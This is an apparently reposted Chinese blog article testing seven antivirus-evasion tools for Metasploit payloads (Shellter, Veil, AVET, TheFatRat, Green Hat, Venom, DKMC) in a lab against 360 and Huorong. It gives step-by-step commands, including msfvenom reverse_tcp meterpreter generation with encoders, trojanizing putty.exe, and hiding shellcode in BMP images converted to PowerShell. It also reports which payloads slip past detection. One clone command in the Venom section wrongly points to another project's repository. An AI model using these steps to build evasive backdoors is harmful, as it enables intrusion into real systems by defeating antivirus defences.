当前位置:   article > 正文

msf rhosts设置文件_聊一聊基于 msf 的免杀项目测试过程

msf rhosts lhosts

本文作者:ven0m(信安之路红蓝对抗小组成员)

招新文章:信安之路红蓝对抗小组招募志同道合的朋友

我们在渗透中,需要解决的两个主要问题,一个是过安全检测设备(俗称过 WAF),一个是过杀毒软件(免杀);免杀又分为脚本免杀(PHP, JSP, ASP 等)和二进制免杀,今天主要是来总结一下常见的 MSF 免杀工具的使用方法以及对比一下免杀效果。

在这里我选了三款比较典型的杀毒软件,也是国内用的最多的三款, 360 杀毒软件,360 安全卫生,火绒。

环境准备:

攻击机:kali2.0 

IP 地址:192.168.83.177

目标机:windows7

IP 地址:192.168.83.176

安装环境:

目标机安装 360 杀毒软件,360 安全卫生,火绒 全部更新到最新版本

0x00 shellter 工具使用

很老的一款工具了,最新的版本是 Shellter v7.1,原理就不介绍了,大家可以看官网或自行百度,官网地址:

https://www.shellterproject.com/download/

Kali 安装 :

apt-get install shellter 

也支持 windows 系统,这里使用的是 windows 版本。

方法一:使用 shellter 自带 payload

shellter 工具是注入、捆绑软件达到免杀目的,需要一个载体,这里使用 32 位 putty.exe,放到 shellter 文件夹下面,

18f5c9c496cd981c2fe76696a7aa6b66.png

运行 shellter,选择 A,自动

5b0f77e72635c4a783eea909a596f9e3.png

PE Target:putty.exe 输入要注入到软件的名字,这里是 putty

a247b126a0b44e9cbf00fa11da277f4e.png

选择 payload,这里选 shellter 自带的 payload

4293868e1b3f1e7ec801ae4cc6ba90ed.png

:如果上线不成功,可以选择 1

2964809004d236b8f5f186ecf92aab13.png

回车后完成,非常简单

双击 putty.exe,成功上线成功,

b28b10cf7bb6c54dbd54c5473434928e.png

用 360 杀毒软件查杀,云查报毒

599c4526f817b5739c3ccbad8d8b49a0.png

火绒也报

c84d365adde841d335a4516e100052fa.png

方法二:使用 msfvenom 生成 payload

生成命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.83.177 lport=5555 -b "x00xff" -e x86/shikata_ga_nai -i 20 -f raw -o /home/pp.raw 

ee3568e9a2d2940275121f83ba6370e6.png

大家也体验到了,使用 msfvenom 工具生成木马文件,需要提前记住很多的参数,使用起来非常的不方便,下一篇文章我会告诉大家如何自动补全命令,像这样,

d0d0b9d45dcfd787496db7fc7cadefb9.png

将生成的 pp.raw 放到 shellter 文件夹下,

235d37e88ac145a019ba2506a0952b3e.png

操作与上面的一样,这里选择 C,

8575f3ace861a418f8d33795acc38199.png

运行,OK,可以反弹

fe5753e00538e2f81f5147e4cca6a884.png

使用 360 扫描,报毒,跟之前一样

95bf6882024bb7c728e84901c1d9397a.png

虽然扫描不拦截,但是运行拦截

ec03b867a7ca64afc53d4fc4550f4d6f.png

9657083f860c29e2ae6c583672076fa8.png

0x01 veil 工具使用

此工具当时能过很多杀软,免杀必备神器,目前更新的版本为3.1,

在 kali 上直接安装 :

apt-get install veil 

输入 veil 打开操作界面

ec2fa951febf0013f76f88d8c1560806.png

输入 use 1 查看 41 个 payload 选项

39d01f7134b01f2056c89a2e6e1fdc7f.png

选择 pyaload 7,生成 exe 文件,这里为 cc.exe,

924158ac588f04ce73a7adc85a9c152a.png

使用 360 杀毒查杀,小红伞引擎报毒

bd58d02fa2c3593813fa862fcd122ca0.png

火绒也报

082b9a3a7183bc5a2c01b055070389e4.png

0x02 avet 工具使用

此工具当年在 2017 年黑帽大会上惊艳全场,

使用 kali 下载:

git clone https://github.com/govolution/avet.git

292331699e25b28d9c4ada988a044767.png

进入 avet 文件夹内,进入 build 文件夹下,修改 global_connect_config.sh 文件,更改 kali IP 地址,端口号为 7777, 运行:

./avet_fabric.py 

9b7dd069c1173ab234998438bba24255.png

选择 1, 一路回车

34e06a5278d068450d6b147a27f9fc58.png

生成 output.exe 运行文件,使用 360 杀毒,没有查出

c251cab5f5dccca33850e26fc407e81c.png

火绒报毒

4426635371f8998d95e100b0e43ff8e0.png

生成前 10 个 payload,使用 360 查杀,发现 2.3.5.7 报毒

452a2470478b1b5244d0ca0738f4daf4.png

使用火绒,发现 1.3.5.7 报毒

053319206d381c0f01512e8949cba826.png

其它的方法可以自行尝试,回连好像有点问题。 

0x03 Thefatrat 工具使用

三年前的一个工具了,主要是为旁路 AV 和 Easy 工具生成后门用于后渗透攻击,此工具创建的恶意软件还具有绕过大多数 AV 软件保护的能力,它是个多功能工具。

项目地址: 

https://github.com/Screetsec/TheFatRat

kali安装:

git clone https://github.com/Screetsec/TheFatRat.git

103961dba9572c6930d41e356b0a1ac3.png

进入到目录下:

cd TheFatRat

给运行程序授运行权限:

chmod +x setup.sh

953c50df9ddb62cb195ae55270d94633.png

运行./setup.sh,完成安装

885315512144fca7cb7264940631862d.png

等段时间后,在执行 .fatrat

b1e7dded12fd2121bbb602c6e7e4bf20.png

经过一系列的安装后,出来这个界面就OK了,

8058b446c8e474eced8cf7eab3739ed0.png

输入 1, 选择第 1 个,

6792d252fcd5172b310e1d3f0671e5e9.png

目标机为 windows, 这里选 2, 设置参数, IP,端口,生成执行文件名称等

71fca9c9e1c8e3b5b028140497679c3f.png

Payload 选择第 3 个,

3c4c8b7bd6074af6559356a57a639e4c.png

成功生成文件

41aa43e44208981641d61e517fdfb8ea.png

使用360查杀,小红伞报毒

7366e27ec730d8fd4517f11a2b6d143b.png

火绒也报

5cd5a06531867e89208aa966dbdc8caf.png

0x04 Green hat pro 工具使用

今天给大家介绍一款新的免杀工具,我看了一下,目前应该没有多少人知道吧,也没有相关的贴子,不过工具都出来 2 年多了,试了一下,好像能过 360,但是过不了火绒。算是给各位的福利吧。

项目地址:

https://github.com/Green-m/green-hat-suite

将安装文件下载下来,传到 kali home 文件夹下面,

开始安装:

gem install os apt-get install mingw-w64

d1470c69041bdbf0d4d3b4c19647fc1c.png

因为是 kali 有些环境已安装好:

进入目录:

cd green-hat 

进行安装 :

ruby greenhat.rb 

5d3f8ee332c84adfa0dea595a5a2bcaf.png

安装完成后,如下界面,

90d4a1ad71df3cb0915c25618df04dd6.png

其中标识 1 ,2,3 是要手动输入的,payload 要与上面显示的一致,这里我选的是第 3 个 payload 做演示,

84c76fe154093a9c127052c7ee771042.png

最后生成 exe 执行文件

89a03448f93555dd9a803d29c3b191f6.png

使用 360 杀毒查杀,没反应,

f259c4381647a3f4e01ad77e0542d21f.png

230134b37d0caa500bc3f3c97272ae96.png

火绒能查杀出来

333e7cbbdb2cb665e2564eb22117e7a4.png

运行 360 也不拦截,其它的 payload 自行测试

875e8314045f4d7a81d3b99ff6dfb2c8.png

0x05 Venom 工具使用

这款工具也比较老了,最新是在去年更新的,主要是 msf shellcode 生成器及编译器

项目地址:

https://github.com/r00t-3xp10it/venom

下载到本地: 

git clone https://github.com/Green-m/green-hat-suite.git

cd venom , 赋予文件执行权限,进入 aux 文件夹下,找到 setup.sh,

3b2cbd1b168e5f6191f924a519404a78.png

./setup 执行安装依赖环境,安装完成

ae31bc0a3af93d2f9a2e83a34e851df0.png

./venom 运行程序,来到主菜单界面

444f1616064c31ba93ea0595531b6ce8.png

选择第 2 个,共有 20 个 agent 供选择,

e4602fd02d4da75b120b9fdc34d5bf37.png

这里选择第 15 个 agent 

5aee009a4123035eab9ce2c62e562995.png

输入反弹 IP 地址,这里为 192.168.83.177

814f097ce6b624976135cad20444f156.png

输入反弹端口号,

343c109b3df254428945fe4f590a236f.png

生成的 shellcode 文件名称

f3bdd5088cec697aa20e53ab5ddca801.png

设置 payload 的方式

b90169d4062244516be936126391e61d.png

选择反弹模块

b7de9be1eb6f38e69f9294c4f165b10a.png

自动启用监听模块

816e830955ed272634da7444f62ef3db.png

在 venom/output/ 文件夹下找到创建的 demo.exe文件,上传到目标主机上

360 报毒

f4ba73ff21c4c4a49415bd6090614578.png

火绒也报

35abf4f60b8cabe63d62c6330dd73116.png

这只是个方法,我使用第 16 个 agent, 360 与火绒都检查不出来

104c0f47f60c4f5f59ced742bf0cfa21.png

37c1a783c5165cd90e345b2d679148a4.png

e45b500efe605867263f50fc3a04ad5d.png

找到自己适合的 agent 就行 

0x06 DKMC 工具使用

这款工具也有 3 年了,主要是生成混淆 shellcode,存储在图片中运行,5 个月前好像有更新过

项目地址:

https://github.com/Mr-Un1k0d3r/DKMC

安装如下:

git clone https://github.com/Mr-Un1k0d3r/DKMC

下载不下来就手动下载,拖到 kali 系统里, 创建一个输出文件夹:

cd /DKMC 

mkdir output 

运行程序 

python dkmc.py 

78467fd98e91674e8d0c32c86a506a8f.png

操作顺序:

Sc:是将 msf 生成的 raw 文件转换位 shellcode 代码

Gen:是将其 msf 的 shellcode 注入到 BMP 图片中

Ps:将其 BMP 的图片转换为 powershell 代码

Web:将其开启 web 功能

第一步,先生成原始的 shellcode 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.83.177 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /home/DKMC/dk

cd6992f7f305b905c997617c35554f79.png

第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出

434984aae1b3615021da82f5c58ef1ef.png

第三步,启动 gen 功能,将 shellcode 注入到图片中,设备图片位置和 shellcode 参数,

9c1673026237ff5219c7ab0fb9e4cbdb.png

output 文件夹下生成一个注入 shellcode 图片,exit 退出到菜单界面

76e3d57c38f9585ea01731c5c237b19c.png

第四步,将图下转换成 powershell 文件,保存成为 dk.ps1 格式
第五步,开启 web 功能,直接运行即可 

2b394f055660b6d7c325df4484814de0.png

将生成的 dk.ps1 上传到目标机上,360 查杀不出来

4d0d469ee854b598105b553f32a8ba02.png

火绒也不报毒

dfbed1140350b69b0213c95a3c53f86f.png

运行拦截

a1d8e2b9675278bea9dcee639a076cf3.png

5e66c1ed793e29295b606325c51ed380.png

0x07 总结:

这次共介绍了7款工具的使用方法和测试免杀性,各有利弊,工具是死的,思维是活的,只要理解工具的原理,就可以改造出多种工具方法。像这种工具只要一公布出来,肯定是不能存活的,工具只是教大家一种方法,可以结合多种工具。另外,其实免杀思路还有很多,如果编程功底好,可以自己写个壳,只要不公布出来,肯定是免杀的。

关于这次工具测试,我只试了某个工具的一部分功能,其余的大家可以自行测试,总可以找到适合自己的。

3e4af87a3dd9aecec445a44356dbef18.png

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Monodyee/article/detail/390649
推荐阅读
相关标签
  

闽ICP备14008679号